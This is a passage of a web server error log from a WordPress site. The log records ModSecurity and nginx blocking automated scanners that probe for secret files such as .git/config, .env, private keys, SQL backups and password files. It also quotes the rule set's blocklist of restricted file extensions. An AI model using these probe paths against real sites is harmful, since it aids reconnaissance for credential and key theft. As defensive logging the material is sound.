"OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "Z0SocUw_ksn7Ln2zK4XbjgAAAMU"] 2024/11/25 11:40:17 [error] 12406#12406: *110599 access forbidden by rule, client: 213.232.87.230, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Mon Nov 25 11:40:17.430946 2024] [:error] [pid 13152:tid 140440196052736] [client 213.232.87.230:49506] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/server.key"] [unique_id "Z0SocUw_ksn7Ln2zK4XbkwAAAMg"] [Mon Nov 25 11:40:17.447444 2024] [:error] [pid 12549:tid 140440212838144] [client 213.232.87.230:49518] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "Z0SocZlKNECZjHgd05aQ7AAAAIY"] [Mon Nov 25 11:40:17.449230 2024] [:error] [pid 12549:tid 140440212838144] [client 213.232.87.230:49522] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z0SocZlKNECZjHgd05aQ7gAAAIY"] [Mon Nov 25 11:40:17.449338 2024] [:error] [pid 12549:tid 140440070162176] [client 213.232.87.230:49520] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z0SocZlKNECZjHgd05aQ7QAAAJc"] [Mon Nov 25 11:40:17.494377 2024] [:error] [pid 12549:tid 140440162481920] [client 213.232.87.230:49532] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z0SocZlKNECZjHgd05aQ8wAAAIw"] [Mon Nov 25 11:40:17.846936 2024] [authz_host:error] [pid 12549:tid 140440212838144] [client 213.232.87.230:49524] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Mon Nov 25 11:40:17.847003 2024] [authz_core:error] [pid 12549:tid 140440212838144] [client 213.232.87.230:49524] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/25 19:21:25 [error] 12406#12406: *113668 access forbidden by rule, client: 45.154.98.93, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/25 20:26:10 [error] 12406#12406: *114319 access forbidden by rule, client: 45.154.98.93, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Nov 25 22:02:30.737425 2024] [autoindex:error] [pid 23838:tid 140440229623552] [client 20.39.184.180:58584] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/11/26 00:50:45 [error] 12406#12406: *119789 access forbidden by rule, client: 45.154.98.93, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Nov 26 12:14:11.584991 2024] [:error] [pid 15758:tid 140249564948224] [client 154.203.197.123:53514] [client 154.203.197.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Microsoft URL Control"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "Z0YB4wMwfWcdVnNNMYPzNwAAAIU"] 2024/11/26 12:23:56 [error] 15720#15720: *131576 access forbidden by rule, client: 18.175.175.158, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/26 12:29:08 [error] 15720#15720: *131591 access forbidden by rule, client: 18.175.175.158, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/26 14:55:17 [error] 15720#15720: *133131 access forbidden by rule, client: 45.148.10.236, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/26 15:00:35 [error] 15721#15721: *133153 access forbidden by rule, client: 45.148.10.236, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/26 15:27:02 [error] 15720#15720: *133395 access forbidden by rule, client: 45.148.10.236, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Nov 26 17:18:47.343767 2024] [authz_core:error] [pid 16325:tid 140249556555520] [client 64.226.78.121:59614] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/26 17:18:51 [error] 15721#15721: *134482 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Nov 26 21:16:25.784969 2024] [authz_core:error] [pid 15758:tid 140249598519040] [client 64.226.65.160:35462] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/26 21:16:30 [error] 15720#15720: *136889 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Nov 26 23:57:58.869486 2024] [:error] [pid 15758:tid 140249481021184] [client 54.177.60.120:37414] [client 54.177.60.120] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.investigacionperu.com"] [uri "/.env"] [unique_id "Z0am1gMwfWcdVnNNMYP2IAAAAI8"] 2024/11/27 00:10:12 [error] 15721#15721: *138252 access forbidden by rule, client: 45.148.10.236, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/27 01:39:45 [error] 15721#15721: *139447 access forbidden by rule, client: 45.148.10.236, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Nov 27 03:48:12.828450 2024] [:error] [pid 521:tid 139912812635904] [client 18.175.175.158:42366] [client 18.175.175.158] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/s3cmd.ini"] [unique_id "Z0bczFjq46VsuqAZV6VO2wAAANA"] [Wed Nov 27 13:41:49.976428 2024] [:error] [pid 32377:tid 139912787457792] [client 18.175.175.158:52550] [client 18.175.175.158] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/s3cmd.ini"] [unique_id "Z0dn7dMKrAlnhpnVDk1ElwAAAJM"] [Wed Nov 27 22:21:36.825284 2024] [:error] [pid 521:tid 139912829421312] [client 18.175.175.158:46288] [client 18.175.175.158] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/s3cmd.ini"] [unique_id "Z0fhwFjq46VsuqAZV6VeWAAAAM4"] [Thu Nov 28 11:11:10.157038 2024] [:error] [pid 13596:tid 139992965830400] [client 154.26.133.94:35030] [client 154.26.133.94] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "14"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z0iWHjLmmLoL2ye_TgH0BAAAAIU"] [Thu Nov 28 15:47:55.642791 2024] [:error] [pid 13595:tid 139992823154432] [client 18.118.241.92:39792] [client 18.118.241.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/.env"] [unique_id "Z0jW-zBQPPAatPgUeotR4gAAAFY"] [Thu Nov 28 16:24:26.715489 2024] [authz_core:error] [pid 14152:tid 139992890296064] [client 206.189.19.19:40292] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/28 16:24:31 [error] 13463#13463: *176409 access forbidden by rule, client: 206.189.19.19, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Nov 28 20:36:18.634969 2024] [authz_core:error] [pid 13594:tid 139992940652288] [client 138.197.191.87:43012] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/28 20:36:23 [error] 13462#13462: *179149 access forbidden by rule, client: 138.197.191.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Nov 29 06:38:08.191228 2024] [autoindex:error] [pid 22029:tid 140392808802048] [client 20.242.61.89:54134] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 29 06:38:23.206500 2024] [:error] [pid 22029:tid 140392758445824] [client 20.242.61.89:54276] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Nov 29 06:38:30.296138 2024] [autoindex:error] [pid 17728:tid 140392716482304] [client 20.242.61.89:54332] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 29 06:38:39.591236 2024] [autoindex:error] [pid 22030:tid 140392817194752] [client 20.242.61.89:54404] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 29 06:38:41.715528 2024] [autoindex:error] [pid 22029:tid 140392724875008] [client 20.242.61.89:54422] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 29 06:38:43.777901 2024] [:error] [pid 22029:tid 140392867550976] [client 20.242.61.89:54442] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Nov 29 06:38:43.805470 2024] [:error] [pid 22029:tid 140392691304192] [client 20.242.61.89:54444] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Nov 29 06:39:30.467528 2024] [:error] [pid 17728:tid 140392691304192] [client 20.242.61.89:54726] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Fri Nov 29 06:39:36.095876 2024] [autoindex:error] [pid 18286:tid 140392808802048] [client 20.242.61.89:54754] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 29 06:40:07.851570 2024] [:error] [pid 22029:tid 140392808802048] [client 20.242.61.89:54918] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Nov 29 23:15:09.530935 2024] [authz_core:error] [pid 22029:tid 140392833980160] [client 157.245.105.107:46324] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/29 23:15:16 [error] 17595#17595: *200029 access forbidden by rule, client: 157.245.105.107, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Nov 30 06:13:57.573272 2024] [:error] [pid 21288:tid 140531556361984] [client 167.234.219.210:51970] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Nov 30 06:14:13.288188 2024] [:error] [pid 21289:tid 140531623503616] [client 167.234.219.210:52002] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Nov 30 06:14:13.365870 2024] [:error] [pid 21904:tid 140531556361984] [client 167.234.219.210:52004] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Nov 30 06:14:54.782733 2024] [autoindex:error] [pid 21904:tid 140531531183872] [client 167.234.219.210:52108] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 06:15:06.785254 2024] [:error] [pid 21288:tid 140531648681728] [client 167.234.219.210:52132] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Nov 30 06:15:07.845943 2024] [autoindex:error] [pid 21288:tid 140531631896320] [client 167.234.219.210:52136] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 06:15:08.890856 2024] [autoindex:error] [pid 21289:tid 140531756902144] [client 167.234.219.210:52140] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 06:15:14.484889 2024] [:error] [pid 21904:tid 140531773687552] [client 167.234.219.210:52156] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Nov 30 06:15:14.555530 2024] [:error] [pid 21289:tid 140531598325504] [client 167.234.219.210:52158] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Nov 30 06:16:03.232813 2024] [:error] [pid 21289:tid 140531564754688] [client 167.234.219.210:52278] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Nov 30 06:16:17.331096 2024] [:error] [pid 21904:tid 140531782080256] [client 167.234.219.210:52318] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Nov 30 06:16:17.401761 2024] [:error] [pid 21904:tid 140531756902144] [client 167.234.219.210:52320] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Nov 30 06:16:58.249866 2024] [autoindex:error] [pid 21288:tid 140531581540096] [client 167.234.219.210:52424] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 06:17:08.998217 2024] [:error] [pid 21904:tid 140531765294848] [client 167.234.219.210:52452] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Nov 30 06:17:10.072707 2024] [autoindex:error] [pid 21904:tid 140531665467136] [client 167.234.219.210:52458] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 06:17:11.112880 2024] [autoindex:error] [pid 21904:tid 140531615110912] [client 167.234.219.210:52462] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Nov 30 06:17:16.961554 2024] [:error] [pid 21288:tid 140531573147392] [client 167.234.219.210:52484] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Nov 30 06:17:17.033492 2024] [:error] [pid 21287:tid 140531539576576] [client 167.234.219.210:52486] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Nov 30 12:47:18.619927 2024] [:error] [pid 21904:tid 140531547969280] [client 111.229.83.85:58906] [client 111.229.83.85] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0tPpm2LuHMk5nM32eIktwAAANU"], referer: https://investigacionperu.com/xmlrpc.php [Sat Nov 30 12:47:18.620003 2024] [:error] [pid 21904:tid 140531547969280] [client 111.229.83.85:58906] [client 111.229.83.85] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0tPpm2LuHMk5nM32eIktwAAANU"], referer: https://investigacionperu.com/xmlrpc.php [Sat Nov 30 12:47:19.696840 2024] [:error] [pid 21289:tid 140531657074432] [client 111.229.83.85:58908] [client 111.229.83.85] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z0tPpxg1HQEU_r5FNtEQrwAAAIg"], referer: https://investigacionperu.com/xmlrpc.php [Sat Nov 30 12:47:19.696987 2024] [:error] [pid 21289:tid 140531657074432] [client 111.229.83.85:58908] [client 111.229.83.85] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 